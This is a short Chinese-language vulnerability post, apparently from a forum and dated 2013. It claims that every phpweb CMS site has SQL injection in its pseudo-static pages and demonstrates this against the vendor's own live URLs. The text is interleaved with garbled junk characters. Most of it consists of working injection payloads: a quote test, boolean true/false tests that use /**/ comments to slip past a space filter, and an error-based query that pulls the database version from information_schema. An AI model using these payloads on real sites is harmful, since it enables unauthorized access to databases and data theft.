phpweb所有的整站程序伪静态页面都存在sql注入
' r/ q0 @; S. t% O" x3 s2 B- I
. `5 j/ s" I, k% |主站:http://phpweb.net/
" \. K8 \ W" @0 Q$ S加’检测:6 o8 s2 v/ b' l1 \+ `* |' ^$ t) r
4 B" ?3 Z" P9 C/ O. ~( J/ M! Uhttp://www.phpweb.net/down/html/?772′.html
7 P' p% H$ d" F: O( ?7 O7 X ( B9 l7 h7 U+ ^( ~$ H3 \* _
出错
! O7 {7 f- r# y存在注入。
! T! O# Z& D# V2 a# u. t, j不能用空格,只能用/*罗
4 d/ O7 k) G, ]7 x1 Y9 b" Ohttp://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常9 Q+ Z& G3 f6 K# F* ~3 d) A3 H
* C* x E' C* o/ S% j! Vhttp://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.9 y2 @, ?+ V, Y- U" h' [
爆数据库版本:
0 h" T/ X" _' f. e+ f- v' h- r 9 y/ p% {; s; m3 f" Z
?/ t& ~% L7 c& {9 E, }" z( J# W7 o
1: [% \9 |( b5 M! U8 d, a& |+ v; c" K
http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html
! a/ c' _" `2 o; M更新日期: 2013-01-03 13:39:50
F% v$ y P+ J0 v |